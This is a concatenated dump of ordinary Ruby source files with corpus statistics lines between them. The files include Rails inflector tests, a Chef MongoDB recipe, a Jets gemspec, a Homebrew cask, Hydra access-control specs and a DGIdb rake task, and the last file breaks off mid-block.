url: 'https://admin:[email protected]/',
}
end
let(:facts) do
{
aio_agent_version: '5.5.0',
puppetversion: '5.5.0',
puppet_settings_deviceconfig: '/etc/puppetlabs/puppet/device.conf',
puppet_settings_confdir: '/etc/puppetlabs',
os: { family: 'redhat' },
}
end
it { is_expected.to raise_error(%r{are mutually-exclusive}) }
end
end
| 32.753378 | 147 | 0.614028 |
015c509c2cf00615ecc7dece96bdc9a98b554f80 | 1,269 | #
# Cookbook Name:: sc-mongodb
# Recipe:: configserver
#
# Copyright 2011, edelight GmbH
# Authors:
# Markus Korn <[email protected]>
#
# Copyright 2016-2017, Grant Ridder
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
node.override['mongodb']['is_configserver'] = true
node.override['mongodb']['is_replicaset'] = true
node.override['mongodb']['cluster_name'] = node['mongodb']['cluster_name']
include_recipe 'sc-mongodb::install'
# mongodb_instance will set configsvr = true in the config file.
# http://docs.mongodb.org/manual/reference/configuration-options/#sharded-cluster-options
# we still explicitly set the port and small files.
mongodb_instance node['mongodb']['instance_name']['mongod'] do
mongodb_type 'configserver'
replicaset true
end
| 34.297297 | 89 | 0.754137 |
6184df481fe717eae9df973604c118d4b5d66c71 | 19,780 | require 'abstract_unit'
require 'active_support/inflector'
require 'inflector_test_cases'
require 'constantize_test_cases'
class InflectorTest < ActiveSupport::TestCase
include InflectorTestCases
include ConstantizeTestCases
def test_pluralize_plurals
assert_equal "plurals", ActiveSupport::Inflector.pluralize("plurals")
assert_equal "Plurals", ActiveSupport::Inflector.pluralize("Plurals")
end
def test_pluralize_empty_string
assert_equal "", ActiveSupport::Inflector.pluralize("")
end
ActiveSupport::Inflector.inflections.uncountable.each do |word|
define_method "test_uncountability_of_#{word}" do
assert_equal word, ActiveSupport::Inflector.singularize(word)
assert_equal word, ActiveSupport::Inflector.pluralize(word)
assert_equal ActiveSupport::Inflector.pluralize(word), ActiveSupport::Inflector.singularize(word)
end
end
def test_uncountable_word_is_not_greedy
with_dup do
uncountable_word = "ors"
countable_word = "sponsor"
ActiveSupport::Inflector.inflections.uncountable << uncountable_word
assert_equal uncountable_word, ActiveSupport::Inflector.singularize(uncountable_word)
assert_equal uncountable_word, ActiveSupport::Inflector.pluralize(uncountable_word)
assert_equal ActiveSupport::Inflector.pluralize(uncountable_word), ActiveSupport::Inflector.singularize(uncountable_word)
assert_equal "sponsor", ActiveSupport::Inflector.singularize(countable_word)
assert_equal "sponsors", ActiveSupport::Inflector.pluralize(countable_word)
assert_equal "sponsor", ActiveSupport::Inflector.singularize(ActiveSupport::Inflector.pluralize(countable_word))
end
end
SingularToPlural.each do |singular, plural|
define_method "test_pluralize_singular_#{singular}" do
assert_equal(plural, ActiveSupport::Inflector.pluralize(singular))
assert_equal(plural.capitalize, ActiveSupport::Inflector.pluralize(singular.capitalize))
end
end
SingularToPlural.each do |singular, plural|
define_method "test_singularize_plural_#{plural}" do
assert_equal(singular, ActiveSupport::Inflector.singularize(plural))
assert_equal(singular.capitalize, ActiveSupport::Inflector.singularize(plural.capitalize))
end
end
SingularToPlural.each do |singular, plural|
define_method "test_pluralize_plural_#{plural}" do
assert_equal(plural, ActiveSupport::Inflector.pluralize(plural))
assert_equal(plural.capitalize, ActiveSupport::Inflector.pluralize(plural.capitalize))
end
define_method "test_singularize_singular_#{singular}" do
assert_equal(singular, ActiveSupport::Inflector.singularize(singular))
assert_equal(singular.capitalize, ActiveSupport::Inflector.singularize(singular.capitalize))
end
end
def test_overwrite_previous_inflectors
assert_equal("series", ActiveSupport::Inflector.singularize("series"))
ActiveSupport::Inflector.inflections.singular "series", "serie"
assert_equal("serie", ActiveSupport::Inflector.singularize("series"))
ActiveSupport::Inflector.inflections.uncountable "series" # Return to normal
end
MixtureToTitleCase.each_with_index do |(before, titleized), index|
define_method "test_titleize_mixture_to_title_case_#{index}" do
assert_equal(titleized, ActiveSupport::Inflector.titleize(before), "mixture \
to TitleCase failed for #{before}")
end
end
def test_camelize
CamelToUnderscore.each do |camel, underscore|
assert_equal(camel, ActiveSupport::Inflector.camelize(underscore))
end
end
def test_camelize_with_lower_downcases_the_first_letter
assert_equal('capital', ActiveSupport::Inflector.camelize('Capital', false))
end
def test_camelize_with_underscores
assert_equal("CamelCase", ActiveSupport::Inflector.camelize('Camel_Case'))
end
def test_acronyms
ActiveSupport::Inflector.inflections do |inflect|
inflect.acronym("API")
inflect.acronym("HTML")
inflect.acronym("HTTP")
inflect.acronym("RESTful")
inflect.acronym("W3C")
inflect.acronym("PhD")
inflect.acronym("RoR")
inflect.acronym("SSL")
end
# camelize underscore humanize titleize
[
["API", "api", "API", "API"],
["APIController", "api_controller", "API controller", "API Controller"],
["Nokogiri::HTML", "nokogiri/html", "Nokogiri/HTML", "Nokogiri/HTML"],
["HTTPAPI", "http_api", "HTTP API", "HTTP API"],
["HTTP::Get", "http/get", "HTTP/get", "HTTP/Get"],
["SSLError", "ssl_error", "SSL error", "SSL Error"],
["RESTful", "restful", "RESTful", "RESTful"],
["RESTfulController", "restful_controller", "RESTful controller", "RESTful Controller"],
["IHeartW3C", "i_heart_w3c", "I heart W3C", "I Heart W3C"],
["PhDRequired", "phd_required", "PhD required", "PhD Required"],
["IRoRU", "i_ror_u", "I RoR u", "I RoR U"],
["RESTfulHTTPAPI", "restful_http_api", "RESTful HTTP API", "RESTful HTTP API"],
# misdirection
["Capistrano", "capistrano", "Capistrano", "Capistrano"],
["CapiController", "capi_controller", "Capi controller", "Capi Controller"],
["HttpsApis", "https_apis", "Https apis", "Https Apis"],
["Html5", "html5", "Html5", "Html5"],
["Restfully", "restfully", "Restfully", "Restfully"],
["RoRails", "ro_rails", "Ro rails", "Ro Rails"]
].each do |camel, under, human, title|
assert_equal(camel, ActiveSupport::Inflector.camelize(under))
assert_equal(camel, ActiveSupport::Inflector.camelize(camel))
assert_equal(under, ActiveSupport::Inflector.underscore(under))
assert_equal(under, ActiveSupport::Inflector.underscore(camel))
assert_equal(title, ActiveSupport::Inflector.titleize(under))
assert_equal(title, ActiveSupport::Inflector.titleize(camel))
assert_equal(human, ActiveSupport::Inflector.humanize(under))
end
end
def test_acronym_override
ActiveSupport::Inflector.inflections do |inflect|
inflect.acronym("API")
inflect.acronym("LegacyApi")
end
assert_equal("LegacyApi", ActiveSupport::Inflector.camelize("legacyapi"))
assert_equal("LegacyAPI", ActiveSupport::Inflector.camelize("legacy_api"))
assert_equal("SomeLegacyApi", ActiveSupport::Inflector.camelize("some_legacyapi"))
assert_equal("Nonlegacyapi", ActiveSupport::Inflector.camelize("nonlegacyapi"))
end
def test_acronyms_camelize_lower
ActiveSupport::Inflector.inflections do |inflect|
inflect.acronym("API")
inflect.acronym("HTML")
end
assert_equal("htmlAPI", ActiveSupport::Inflector.camelize("html_api", false))
assert_equal("htmlAPI", ActiveSupport::Inflector.camelize("htmlAPI", false))
assert_equal("htmlAPI", ActiveSupport::Inflector.camelize("HTMLAPI", false))
end
def test_underscore_acronym_sequence
ActiveSupport::Inflector.inflections do |inflect|
inflect.acronym("API")
inflect.acronym("JSON")
inflect.acronym("HTML")
end
assert_equal("json_html_api", ActiveSupport::Inflector.underscore("JSONHTMLAPI"))
end
def test_underscore
CamelToUnderscore.each do |camel, underscore|
assert_equal(underscore, ActiveSupport::Inflector.underscore(camel))
end
CamelToUnderscoreWithoutReverse.each do |camel, underscore|
assert_equal(underscore, ActiveSupport::Inflector.underscore(camel))
end
end
def test_camelize_with_module
CamelWithModuleToUnderscoreWithSlash.each do |camel, underscore|
assert_equal(camel, ActiveSupport::Inflector.camelize(underscore))
end
end
def test_underscore_with_slashes
CamelWithModuleToUnderscoreWithSlash.each do |camel, underscore|
assert_equal(underscore, ActiveSupport::Inflector.underscore(camel))
end
end
def test_demodulize
assert_equal "Account", ActiveSupport::Inflector.demodulize("MyApplication::Billing::Account")
assert_equal "Account", ActiveSupport::Inflector.demodulize("Account")
assert_equal "", ActiveSupport::Inflector.demodulize("")
end
def test_deconstantize
assert_equal "MyApplication::Billing", ActiveSupport::Inflector.deconstantize("MyApplication::Billing::Account")
assert_equal "::MyApplication::Billing", ActiveSupport::Inflector.deconstantize("::MyApplication::Billing::Account")
assert_equal "MyApplication", ActiveSupport::Inflector.deconstantize("MyApplication::Billing")
assert_equal "::MyApplication", ActiveSupport::Inflector.deconstantize("::MyApplication::Billing")
assert_equal "", ActiveSupport::Inflector.deconstantize("Account")
assert_equal "", ActiveSupport::Inflector.deconstantize("::Account")
assert_equal "", ActiveSupport::Inflector.deconstantize("")
end
def test_foreign_key
ClassNameToForeignKeyWithUnderscore.each do |klass, foreign_key|
assert_equal(foreign_key, ActiveSupport::Inflector.foreign_key(klass))
end
ClassNameToForeignKeyWithoutUnderscore.each do |klass, foreign_key|
assert_equal(foreign_key, ActiveSupport::Inflector.foreign_key(klass, false))
end
end
def test_tableize
ClassNameToTableName.each do |class_name, table_name|
assert_equal(table_name, ActiveSupport::Inflector.tableize(class_name))
end
end
# FIXME: get following tests to pass on jruby, currently skipped
#
# Currently this fails because ActiveSupport::Multibyte::Unicode#tidy_bytes
# required a specific Encoding::Converter(UTF-8 to UTF8-MAC) which unavailable on JRuby
# causing our tests to error out.
# related bug http://jira.codehaus.org/browse/JRUBY-7194
def test_parameterize
jruby_skip "UTF-8 to UTF8-MAC Converter is unavailable"
StringToParameterized.each do |some_string, parameterized_string|
assert_equal(parameterized_string, ActiveSupport::Inflector.parameterize(some_string))
end
end
def test_parameterize_and_normalize
jruby_skip "UTF-8 to UTF8-MAC Converter is unavailable"
StringToParameterizedAndNormalized.each do |some_string, parameterized_string|
assert_equal(parameterized_string, ActiveSupport::Inflector.parameterize(some_string))
end
end
def test_parameterize_with_custom_separator
jruby_skip "UTF-8 to UTF8-MAC Converter is unavailable"
StringToParameterizeWithUnderscore.each do |some_string, parameterized_string|
assert_equal(parameterized_string, ActiveSupport::Inflector.parameterize(some_string, '_'))
end
end
def test_parameterize_with_multi_character_separator
jruby_skip "UTF-8 to UTF8-MAC Converter is unavailable"
StringToParameterized.each do |some_string, parameterized_string|
assert_equal(parameterized_string.gsub('-', '__sep__'), ActiveSupport::Inflector.parameterize(some_string, '__sep__'))
end
end
def test_classify
ClassNameToTableName.each do |class_name, table_name|
assert_equal(class_name, ActiveSupport::Inflector.classify(table_name))
assert_equal(class_name, ActiveSupport::Inflector.classify("table_prefix." + table_name))
end
end
def test_classify_with_symbol
assert_nothing_raised do
assert_equal 'FooBar', ActiveSupport::Inflector.classify(:foo_bars)
end
end
def test_classify_with_leading_schema_name
assert_equal 'FooBar', ActiveSupport::Inflector.classify('schema.foo_bar')
end
def test_humanize
UnderscoreToHuman.each do |underscore, human|
assert_equal(human, ActiveSupport::Inflector.humanize(underscore))
end
end
def test_humanize_without_capitalize
UnderscoreToHumanWithoutCapitalize.each do |underscore, human|
assert_equal(human, ActiveSupport::Inflector.humanize(underscore, capitalize: false))
end
end
def test_humanize_by_rule
ActiveSupport::Inflector.inflections do |inflect|
inflect.human(/_cnt$/i, '\1_count')
inflect.human(/^prefx_/i, '\1')
end
assert_equal("Jargon count", ActiveSupport::Inflector.humanize("jargon_cnt"))
assert_equal("Request", ActiveSupport::Inflector.humanize("prefx_request"))
end
def test_humanize_by_string
ActiveSupport::Inflector.inflections do |inflect|
inflect.human("col_rpted_bugs", "Reported bugs")
end
assert_equal("Reported bugs", ActiveSupport::Inflector.humanize("col_rpted_bugs"))
assert_equal("Col rpted bugs", ActiveSupport::Inflector.humanize("COL_rpted_bugs"))
end
def test_constantize
run_constantize_tests_on do |string|
ActiveSupport::Inflector.constantize(string)
end
end
def test_safe_constantize
run_safe_constantize_tests_on do |string|
ActiveSupport::Inflector.safe_constantize(string)
end
end
def test_ordinal
OrdinalNumbers.each do |number, ordinalized|
assert_equal(ordinalized, number + ActiveSupport::Inflector.ordinal(number))
end
end
def test_ordinalize
OrdinalNumbers.each do |number, ordinalized|
assert_equal(ordinalized, ActiveSupport::Inflector.ordinalize(number))
end
end
def test_dasherize
UnderscoresToDashes.each do |underscored, dasherized|
assert_equal(dasherized, ActiveSupport::Inflector.dasherize(underscored))
end
end
def test_underscore_as_reverse_of_dasherize
UnderscoresToDashes.each_key do |underscored|
assert_equal(underscored, ActiveSupport::Inflector.underscore(ActiveSupport::Inflector.dasherize(underscored)))
end
end
def test_underscore_to_lower_camel
UnderscoreToLowerCamel.each do |underscored, lower_camel|
assert_equal(lower_camel, ActiveSupport::Inflector.camelize(underscored, false))
end
end
def test_symbol_to_lower_camel
SymbolToLowerCamel.each do |symbol, lower_camel|
assert_equal(lower_camel, ActiveSupport::Inflector.camelize(symbol, false))
end
end
%w{plurals singulars uncountables humans}.each do |inflection_type|
class_eval <<-RUBY, __FILE__, __LINE__ + 1
def test_clear_#{inflection_type}
with_dup do
ActiveSupport::Inflector.inflections.clear :#{inflection_type}
assert ActiveSupport::Inflector.inflections.#{inflection_type}.empty?, \"#{inflection_type} inflections should be empty after clear :#{inflection_type}\"
end
end
RUBY
end
def test_inflector_locality
ActiveSupport::Inflector.inflections(:es) do |inflect|
inflect.plural(/$/, 's')
inflect.plural(/z$/i, 'ces')
inflect.singular(/s$/, '')
inflect.singular(/es$/, '')
inflect.irregular('el', 'los')
end
assert_equal('hijos', 'hijo'.pluralize(:es))
assert_equal('luces', 'luz'.pluralize(:es))
assert_equal('luzs', 'luz'.pluralize)
assert_equal('sociedad', 'sociedades'.singularize(:es))
assert_equal('sociedade', 'sociedades'.singularize)
assert_equal('los', 'el'.pluralize(:es))
assert_equal('els', 'el'.pluralize)
ActiveSupport::Inflector.inflections(:es) { |inflect| inflect.clear }
assert ActiveSupport::Inflector.inflections(:es).plurals.empty?
assert ActiveSupport::Inflector.inflections(:es).singulars.empty?
assert !ActiveSupport::Inflector.inflections.plurals.empty?
assert !ActiveSupport::Inflector.inflections.singulars.empty?
end
def test_clear_all
with_dup do
ActiveSupport::Inflector.inflections do |inflect|
# ensure any data is present
inflect.plural(/(quiz)$/i, '\1zes')
inflect.singular(/(database)s$/i, '\1')
inflect.uncountable('series')
inflect.human("col_rpted_bugs", "Reported bugs")
inflect.clear :all
assert inflect.plurals.empty?
assert inflect.singulars.empty?
assert inflect.uncountables.empty?
assert inflect.humans.empty?
end
end
end
def test_clear_with_default
with_dup do
ActiveSupport::Inflector.inflections do |inflect|
# ensure any data is present
inflect.plural(/(quiz)$/i, '\1zes')
inflect.singular(/(database)s$/i, '\1')
inflect.uncountable('series')
inflect.human("col_rpted_bugs", "Reported bugs")
inflect.clear
assert inflect.plurals.empty?
assert inflect.singulars.empty?
assert inflect.uncountables.empty?
assert inflect.humans.empty?
end
end
end
Irregularities.each do |singular, plural|
define_method("test_irregularity_between_#{singular}_and_#{plural}") do
with_dup do
ActiveSupport::Inflector.inflections do |inflect|
inflect.irregular(singular, plural)
assert_equal singular, ActiveSupport::Inflector.singularize(plural)
assert_equal plural, ActiveSupport::Inflector.pluralize(singular)
end
end
end
end
Irregularities.each do |singular, plural|
define_method("test_pluralize_of_irregularity_#{plural}_should_be_the_same") do
with_dup do
ActiveSupport::Inflector.inflections do |inflect|
inflect.irregular(singular, plural)
assert_equal plural, ActiveSupport::Inflector.pluralize(plural)
end
end
end
end
Irregularities.each do |singular, plural|
define_method("test_singularize_of_irregularity_#{singular}_should_be_the_same") do
with_dup do
ActiveSupport::Inflector.inflections do |inflect|
inflect.irregular(singular, plural)
assert_equal singular, ActiveSupport::Inflector.singularize(singular)
end
end
end
end
[ :all, [] ].each do |scope|
ActiveSupport::Inflector.inflections do |inflect|
define_method("test_clear_inflections_with_#{scope.kind_of?(Array) ? "no_arguments" : scope}") do
# save all the inflections
singulars, plurals, uncountables = inflect.singulars, inflect.plurals, inflect.uncountables
# clear all the inflections
inflect.clear(*scope)
assert_equal [], inflect.singulars
assert_equal [], inflect.plurals
assert_equal [], inflect.uncountables
# restore all the inflections
singulars.reverse.each { |singular| inflect.singular(*singular) }
plurals.reverse.each { |plural| inflect.plural(*plural) }
inflect.uncountable(uncountables)
assert_equal singulars, inflect.singulars
assert_equal plurals, inflect.plurals
assert_equal uncountables, inflect.uncountables
end
end
end
%w(plurals singulars uncountables humans acronyms).each do |scope|
ActiveSupport::Inflector.inflections do |inflect|
define_method("test_clear_inflections_with_#{scope}") do
with_dup do
# clear the inflections
inflect.clear(scope)
assert_equal [], inflect.send(scope)
end
end
end
end
# Dups the singleton and yields, restoring the original inflections later.
# Use this in tests what modify the state of the singleton.
#
# This helper is implemented by setting @__instance__ because in some tests
# there are module functions that access ActiveSupport::Inflector.inflections,
# so we need to replace the singleton itself.
def with_dup
original = ActiveSupport::Inflector::Inflections.instance_variable_get(:@__instance__)
ActiveSupport::Inflector::Inflections.instance_variable_set(:@__instance__, original.dup)
ensure
ActiveSupport::Inflector::Inflections.instance_variable_set(:@__instance__, original)
end
end
| 37.820268 | 163 | 0.716279 |
bfd3af0b71f955152deeeb1ab72d395f7c905fbe | 2,365 | # coding: utf-8
lib = File.expand_path("../lib", __FILE__)
$LOAD_PATH.unshift(lib) unless $LOAD_PATH.include?(lib)
require "jets/version"
require "jets/rdoc"
Gem::Specification.new do |spec|
spec.name = "jets"
spec.version = Jets::VERSION
spec.authors = ["Tung Nguyen"]
spec.email = ["[email protected]"]
spec.summary = "Ruby Serverless Framework on AWS Lambda"
spec.description = "Jets is a framework that allows you to create serverless applications with a beautiful language: Ruby. It includes everything required to build an application and deploy it to AWS Lambda. Jets makes serverless accessible to everyone."
spec.homepage = "http://rubyonjets.com"
spec.license = "MIT"
spec.required_ruby_version = '~> 2.5'
spec.rdoc_options += Jets::Rdoc.options
vendor_files = Dir.glob("vendor/**/*")
gem_files = `git ls-files -z`.split("\x0").reject do |f|
f.match(%r{^(test|spec|features|docs)/})
end
spec.files = gem_files + vendor_files
spec.bindir = "exe"
spec.executables = spec.files.grep(%r{^exe/}) { |f| File.basename(f) }
spec.test_files = spec.files.grep(%r{^(test|spec|features)/})
spec.require_paths = ["lib"]
spec.add_dependency "actionpack", ">= 5.2.1"
spec.add_dependency "actionview", ">= 5.2.1"
spec.add_dependency "activerecord", ">= 5.2.1"
spec.add_dependency "activesupport", ">= 5.2.1"
spec.add_dependency "aws-sdk-cloudformation"
spec.add_dependency "aws-sdk-cloudwatchlogs"
spec.add_dependency "aws-sdk-dynamodb"
spec.add_dependency "aws-sdk-lambda"
spec.add_dependency "aws-sdk-s3"
spec.add_dependency "aws-sdk-sns"
spec.add_dependency "colorize"
spec.add_dependency "dotenv"
spec.add_dependency "hashie"
spec.add_dependency "json"
spec.add_dependency "kramdown"
spec.add_dependency "memoist"
spec.add_dependency "mimemagic"
spec.add_dependency "rack"
spec.add_dependency "railties", ">= 5.2.1" # ActiveRecord database_tasks.rb require this
spec.add_dependency "recursive-open-struct"
spec.add_dependency "text-table"
spec.add_dependency "thor"
spec.add_dependency "gems" # lambdagem dependency
spec.add_development_dependency "byebug"
spec.add_development_dependency "bundler"
spec.add_development_dependency "rake"
spec.add_development_dependency "rspec"
end
| 39.416667 | 258 | 0.709091 |
79cb50e364f94704f492a6e8b4f5dcee3cf4ba0d | 464 | class GmailNotifr < Cask
version '0.9.0'
sha256 '47ecf1edf08678e6a1c53cb5a3e39d5c6c5f63a9145fc7cbc7df2ebada42b662'
url "https://s3.amazonaws.com/assets.ashchan.com/gmailnotifr/GmailNotifr-#{version}.zip"
appcast 'https://s3.amazonaws.com/assets.ashchan.com/gmailnotifr/update.xml'
homepage 'http://ashchan.com/projects/gmail-notifr'
license :unknown
app 'Gmail Notifr.app'
zap :delete => '~/Library/Preferences/com.ashchan.GmailNotifr.plist'
end
| 35.692308 | 90 | 0.775862 |
28efcdc244640daf925087d047357525c7b7ce56 | 2,484 | DocumentFilterPresenter = Struct.new(:filter, :context, :document_decorator) do
extend Whitehall::Decorators::DelegateInstanceMethodsOf
delegate_instance_methods_of Whitehall::DocumentFilter::Filterer, to: :filter
def as_json(options = nil)
as_hash(options)
end
def as_hash(_options = nil)
data = {
count: documents.count,
current_page: documents.current_page,
total_pages: documents.total_pages,
total_count: documents.total_count,
results: documents.each_with_index.map { |d, i| { result: d.as_hash, index: i + 1 } },
results_any?: documents.any?,
result_type: result_type,
no_results_title: context.t('document_filters.no_results.title'),
no_results_description: context.t('document_filters.no_results.description'),
no_results_tna_heading: context.t('document_filters.no_results.tna_heading'),
no_results_tna_link: context.t('document_filters.no_results.tna_link'),
category: result_type.capitalize,
}
if !documents.last_page? || !documents.first_page?
data[:more_pages?] = true
end
unless documents.last_page?
data[:next_page?] = true
data[:next_page] = documents.current_page + 1
data[:next_page_url] = url(page: documents.current_page + 1)
data[:next_page_web_url] = url(page: documents.current_page + 1, format: nil)
end
unless documents.first_page?
data[:prev_page?] = true
data[:prev_page] = documents.current_page - 1
data[:prev_page_url] = url(page: documents.current_page - 1)
data[:prev_page_web_url] = url(page: documents.current_page - 1, format: nil)
end
data
end
def url(override_params)
context.url_for(context.params.permit!.merge(override_params).merge("_" => nil))
end
def date_from
from_date ? from_date.to_s(:uk_short) : nil
end
def date_to
to_date ? to_date.to_s(:uk_short) : nil
end
def documents
if document_decorator
Whitehall::Decorators::CollectionDecorator.new(
filter.documents, document_decorator, context
)
else
filter.documents
end
end
def result_type
"document"
end
def filtering_command_and_act_papers?
selected_official_document_status == "command_and_act_papers"
end
def filtering_command_papers_only?
selected_official_document_status == "command_papers_only"
end
def filtering_act_papers_only?
selected_official_document_status == "act_papers_only"
end
end
| 31.05 | 92 | 0.714976 |
bbd9fba901659b68257aa7c07c42f116ee847c96 | 662 | Rails.application.routes.draw do
root 'home#index'
$cluster.models.each do |model|
name = model.name.underscore
controller name.pluralize do
collection_path = "/#{ name.pluralize }"
collection_path << "(/s/:series)" if model.acts_as_seriables?
collection_path << "(/p/:page)" if model.acts_as_paginables?
collection_path << "(/o/:pool)" if model.acts_as_poolables?
instance_path = "/#{ name }"
instance_path << if model.acts_as_taggables?
"/:tag"
else
"/:id"
end
get collection_path => :index, as: name.pluralize
get instance_path => :show, as: name
end
end
end
| 24.518519 | 67 | 0.626888 |
87e516165ac59a31184148de88a09ac3801a875e | 752 | ClimateWatchEngine.s3_bucket_name = Rails.application.secrets.s3_bucket_name
# Locations engine initializer
require 'locations'
Locations.locations_filepath = "#{CW_FILES_PREFIX}locations/locations.csv"
Locations.cartodb_url =
'https://wri-01.carto.com/api/v2/sql?q=SELECT%20name_engli,iso,topojson,centroid%20FROM%20gadm28_countries'
Locations.location_groupings_filepath = "#{CW_FILES_PREFIX}locations_members/locations_groupings.csv"
# HistoricalEmissions engine initializer
require 'historical_emissions'
HistoricalEmissions.meta_sectors_filepath = "#{CW_FILES_PREFIX}historical_emissions/historical_emissions_metadata_sectors.csv"
HistoricalEmissions.data_cait_filepath = "#{CW_FILES_PREFIX}historical_emissions/historical_emissions_data.csv"
| 53.714286 | 126 | 0.864362 |
03b1847d5afabd96d6cc69269912edc4abceda13 | 339 | n, M, P, Q = gets.split.map(&:to_i)
fail_leaves = {}
(1..12).each do |m|
fail_leaves[m] = M
if m.between?(P, P + Q - 1) || (m + 12).between?(P, P + Q - 1)
fail_leaves[m] += M
end
end
answer, month = 0, 1
loop do
answer += 1
n -= fail_leaves[month]
break if n <= 0
month += 1
month = 1 if month > 12
end
puts answer | 15.409091 | 64 | 0.551622 |
87fec5390cc42cbd5463840a75170d6e03af3806 | 650 | cask "frescobaldi" do
version "3.1.3"
sha256 "a7c53b67015c8515ae31102a53e16a9eca6b0e5c98ced6e859bb834e3e12f29c"
url "https://github.com/frescobaldi/frescobaldi/releases/download/v#{version}/Frescobaldi-#{version}-x86_64.dmg",
verified: "github.com/frescobaldi/frescobaldi/"
name "Frescobaldi"
desc "LilyPond editor"
homepage "https://frescobaldi.org/"
livecheck do
url "https://github.com/frescobaldi/frescobaldi/releases/"
strategy :page_match
regex(/Frescobaldi[._-]v?(\d+(?:\.\d+)+)[._-]x86[._-]64\.dmg/i)
end
app "Frescobaldi.app"
zap trash: "~/Library/Preferences/org.frescobaldi.frescobaldi.plist"
end
| 30.952381 | 115 | 0.726154 |
7ab0269d1ac4ff3febc0fcaa52bde7a5f545b302 | 774 | # encoding: utf-8
module Gallifreyian
module Translation
class I18nKey
include Mongoid::Document
include Mongoid::Translation
# Field
#
field :state, type: Symbol
# Validations
#
validates :language, presence: true
validate :valid_datum?
def validate
self.state = :valid
end
def validate!
validate
self.i18n_key.save
end
def validation_pending?
self.state == :validation_pending
end
private
def valid_datum?
if self.state.nil?
self.state = :valid
end
unless self.datum.nil? || self.datum.is_a?(String)
errors.add(:datum, :not_a_string)
end
end
end
end
end
| 18 | 58 | 0.564599 |
261a0460c0de007d1f762784a44de4b66be65e7e | 4,301 | require 'spec_helper'
describe Hydra::PolicyAwareAccessControlsEnforcement do
before(:all) do
class MockController
include Hydra::AccessControlsEnforcement
include Hydra::PolicyAwareAccessControlsEnforcement
attr_accessor :params
def user_key
current_user.user_key
end
def session
end
end
@sample_policies = []
# user discover
policy1 = Hydra::AdminPolicy.new(:pid=>"test:policy1")
policy1.default_permissions = [{:type=>"user", :access=>"discover", :name=>"sara_student"}]
policy1.save
@sample_policies << policy1
# user read
policy2 = Hydra::AdminPolicy.new(:pid=>"test:policy2")
policy2.default_permissions = [{:type=>"user", :access=>"read", :name=>"sara_student"}]
policy2.save
@sample_policies << policy2
# user edit
policy3 = Hydra::AdminPolicy.new(:pid=>"test:policy3")
policy3.default_permissions = [{:type=>"user", :access=>"edit", :name=>"sara_student"}]
policy3.save
@sample_policies << policy3
# group discover
policy4 = Hydra::AdminPolicy.new(:pid=>"test:policy4")
policy4.default_permissions = [{:type=>"group", :access=>"discover", :name=>"africana-104-students"}]
policy4.save
@sample_policies << policy4
# group read
policy5 = Hydra::AdminPolicy.new(:pid=>"test:policy5")
policy5.default_permissions = [{:type=>"group", :access=>"read", :name=>"africana-104-students"}]
policy5.save
@sample_policies << policy5
# group edit
policy6 = Hydra::AdminPolicy.new(:pid=>"test:policy6")
policy6.default_permissions = [{:type=>"group", :access=>"edit", :name=>"africana-104-students"}]
policy6.save
@sample_policies << policy6
# no access
policy7 = Hydra::AdminPolicy.create(:pid=>"test:policy7")
@sample_policies << policy7
@policies_with_access = @sample_policies.select { |p| p.pid != policy7.pid }
end
after(:all) do
@sample_policies.each {|p| p.delete }
end
subject { MockController.new }
before do
@solr_parameters = {}
@user_parameters = {}
@user = FactoryGirl.build(:sara_student)
RoleMapper.stub(:roles).with(@user.user_key).and_return(@user.roles)
subject.stub(:current_user).and_return(@user)
end
describe "policies_with_access" do
it "should return the policies that provide discover permissions" do
@policies_with_access.map {|p| p.pid }.each do |p|
subject.policies_with_access.should include(p)
end
end
it "should return the policies that provide discover permissions" do
subject.policies_with_access.should_not include("test:policy7")
end
it "should allow you to configure which model to use for policies" do
Hydra.stub(:config).and_return( {:permissions=>{:policy_class => ModsAsset}} )
ModsAsset.should_receive(:find_with_conditions).and_return([])
subject.policies_with_access
end
end
describe "apply_gated_discovery" do
it "should include policy-aware query" do
# stubbing out policies_with_access because solr doesn't always return them in the same order.
policy_pids = (1..6).map {|n| "test:policy#{n}"}
subject.should_receive(:policies_with_access).and_return(policy_pids)
subject.apply_gated_discovery(@solr_parameters, @user_parameters)
@solr_parameters[:fq].first.should include(" OR (is_governed_by_s:info\\:fedora/test\\:policy1 OR is_governed_by_s:info\\:fedora/test\\:policy2 OR is_governed_by_s:info\\:fedora/test\\:policy3 OR is_governed_by_s:info\\:fedora/test\\:policy4 OR is_governed_by_s:info\\:fedora/test\\:policy5 OR is_governed_by_s:info\\:fedora/test\\:policy6)")
end
it "should not change anything if there are no clauses to add" do
subject.stub(:policy_clauses).and_return(nil)
subject.apply_gated_discovery(@solr_parameters, @user_parameters)
@solr_parameters[:fq].first.should_not include(" OR (is_governed_by_s:info\\:fedora/test\\:policy1 OR is_governed_by_s:info\\:fedora/test\\:policy2 OR is_governed_by_s:info\\:fedora/test\\:policy3 OR is_governed_by_s:info\\:fedora/test\\:policy4 OR is_governed_by_s:info\\:fedora/test\\:policy5 OR is_governed_by_s:info\\:fedora/test\\:policy6)")
end
end
end
| 39.824074 | 352 | 0.695187 |
21884e89afa7aada65501941eb981775e1f52c62 | 2,914 | require 'rbconfig'
require_relative '../utils/snapshot_helpers.rb'
include Utils::SnapshotHelpers
namespace :dgidb do
if Rails.env.production?
data_submodule_path = File.join(Rails.root, 'public', 'data')
else
data_submodule_path = File.join(Rails.root, 'data')
end
data_file = File.join(data_submodule_path, 'data.sql')
version_file = File.join(Rails.root, 'VERSION')
database_name = Rails.configuration.database_configuration[Rails.env]['database']
host = Rails.configuration.database_configuration[Rails.env]['host']
username = Rails.configuration.database_configuration[Rails.env]['username']
desc 'Remove a source from the database given the source_db_name'
task :remove_source, [:source_db_name] => :environment do |_, args|
Utils::Database.delete_source(args[:source_db_name])
end
desc 'set up path for macs running Postgres.app'
task :setup_path do
#special case for macs running Postgres.app
if RbConfig::CONFIG['host_os'] =~ /darwin/ && File.exist?( '/Applications/Postgres.app' )
puts 'Found Postgres.app'
ENV['PATH'] = "/Applications/Postgres.app/Contents/Versions/latest/bin:#{ENV['PATH']}"
end
# MacPorts Handling
macports_postgres = Dir.glob( '/opt/local/lib/postgresql*/bin')
if RbConfig::CONFIG['host_os'] =~ /darwin/ && macports_postgres.any?
macports_postgres_path = macports_postgres.last
